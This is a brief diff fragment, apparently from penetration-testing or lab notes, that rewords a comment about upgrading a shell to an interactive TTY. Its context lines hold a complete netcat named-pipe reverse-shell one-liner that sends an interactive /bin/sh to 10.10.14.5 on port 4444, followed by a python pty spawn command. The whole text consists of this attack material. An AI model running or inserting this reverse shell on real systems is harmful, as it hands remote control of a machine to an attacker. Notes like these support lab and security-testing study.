 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 4444 >/tmp/f

-# Upgrade shell to fully interactive TTY
+# Upgrade a basic shell to a fully interactive TTY

 python3 -c 'import pty; pty.spawn("/bin/bash")'